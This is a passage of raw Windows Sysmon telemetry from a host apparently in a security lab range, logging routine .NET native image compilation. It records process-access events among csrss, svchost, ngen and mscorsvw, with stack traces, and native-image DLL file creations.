13:48:49.262{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-91C1-6005-1003-00000000A301}3232C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007336Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:49.262{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91C1-6005-1003-00000000A301}3232C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000007355Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:55.372{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91C7-6005-1203-00000000A301}2640C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007354Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:55.356{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-91C7-6005-1203-00000000A301}2640C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007353Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:55.356{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91C7-6005-1203-00000000A301}2640C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000007352Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:48:54.997{59A5CD1D-91C1-6005-1003-00000000A301}3232C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\ca0-0\System.Windows.Forms.dll2021-01-18 13:48:54.997 10341000x80000000000000007371Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:56.981{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-91C8-6005-1703-00000000A301}3924C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007370Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:56.981{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91C8-6005-1703-00000000A301}3924C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000007369Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:56.903{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91C8-6005-1603-00000000A301}3732C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007368Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:56.887{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-91C8-6005-1603-00000000A301}3732C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007367Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:56.887{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91C8-6005-1603-00000000A301}3732C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000007366Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:48:56.825{59A5CD1D-91C8-6005-1503-00000000A301}4532C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\11b4-0\System.ServiceProcess.dll2021-01-18 13:48:56.825 10341000x80000000000000007365Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:56.715{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91C8-6005-1503-00000000A301}4532C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007364Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:56.700{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-91C8-6005-1503-00000000A301}4532C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007363Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:56.700{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91C8-6005-1503-00000000A301}4532C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000007362Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:56.590{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91C8-6005-1403-00000000A301}3600C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007361Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:56.575{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-91C8-6005-1403-00000000A301}3600C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007360Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:56.575{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91C8-6005-1403-00000000A301}3600C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000007359Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:48:56.497{59A5CD1D-91C8-6005-1303-00000000A301}1240C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\4d8-0\System.Runtime.Remoting.dll2021-01-18 13:48:56.497 10341000x80000000000000007358Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:56.012{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91C8-6005-1303-00000000A301}1240C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007357Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:55.997{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-91C8-6005-1303-00000000A301}1240C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007356Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:55.997{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91C8-6005-1303-00000000A301}1240C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000007386Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:57.981{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91C9-6005-1B03-00000000A301}1580C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007385Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:57.965{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-91C9-6005-1B03-00000000A301}1580C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007384Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:57.965{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91C9-6005-1B03-00000000A301}1580C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000007383Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 